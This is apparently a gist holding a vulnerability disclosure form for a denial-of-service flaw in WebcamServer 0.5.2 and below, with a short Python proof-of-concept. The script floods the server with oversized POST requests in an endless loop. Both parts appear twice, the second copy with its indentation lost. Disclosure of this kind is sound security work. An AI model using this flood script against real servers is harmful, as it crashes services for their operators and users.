0xHop · December 15, 2021 02:21
diff --git a/gistfile1.txt b/gistfile1.txt
 [description]
 WebcamServer version 0.5.2 and previous does not properly handle clean up memory when receiving HTTP requests.  Multiple large requests will trigger an unhandled Structured Exception Handler which will result in an application crash.
 ------------------------------------------
 [VulnerabilityType Other]
 Denial of Service
 ------------------------------------------
 [Vendor of Product]
 en3rgy
 ------------------------------------------
 [Affected Product Code Base]
 Webcam Server 0.5.2 and below
 ------------------------------------------
 [Affected Component]
 Webcam Server process
 ------------------------------------------
 [Attack Type]
 Remote
 ------------------------------------------
 [Impact Code execution]
 False
 ------------------------------------------
 [Impact Escalation of Privileges]
 False
 ------------------------------------------
 [Impact Information Disclosure]
 False
 ------------------------------------------
 [Attack Vectors]
 Repeated large HTTP Requests
 ------------------------------------------
 [Reference]
 https://sourceforge.net/projects/webcamserv/
 ------------------------------------------
 [Has vendor confirmed or acknowledged the vulnerability?]
 false
 ------------------------------------------
diff --git a/poc.py b/poc.py
 import socket
 import sys

 ip = "127.0.0.1"
 port = 80
 while True:
        buffer = b"A" * 8000
        request = b"POST " + buffer + b" HTTP 1.1"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.connect((ip, port))



        s.send(request)
        s.close()
        print("sending packet")
	[description]
	WebcamServer version 0.5.2 and previous does not properly handle clean up memory when receiving HTTP requests. Multiple large requests will trigger an unhandled Structured Exception Handler which will result in an application crash.
	------------------------------------------
	[VulnerabilityType Other]
	Denial of Service
	------------------------------------------
	[Vendor of Product]
	en3rgy
	------------------------------------------
	[Affected Product Code Base]
	Webcam Server 0.5.2 and below
	------------------------------------------
	[Affected Component]
	Webcam Server process
	------------------------------------------
	[Attack Type]
	Remote
	------------------------------------------
	[Impact Code execution]
	False
	------------------------------------------
	[Impact Escalation of Privileges]
	False
	------------------------------------------
	[Impact Information Disclosure]
	False
	------------------------------------------
	[Attack Vectors]
	Repeated large HTTP Requests
	------------------------------------------
	[Reference]
	https://sourceforge.net/projects/webcamserv/
	------------------------------------------
	[Has vendor confirmed or acknowledged the vulnerability?]
	false
	------------------------------------------
	import socket
	import sys

	ip = "127.0.0.1"
	port = 80
	while True:
	buffer = b"A" * 8000
	request = b"POST " + buffer + b" HTTP 1.1"
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect((ip, port))



	s.send(request)
	s.close()
	print("sending packet")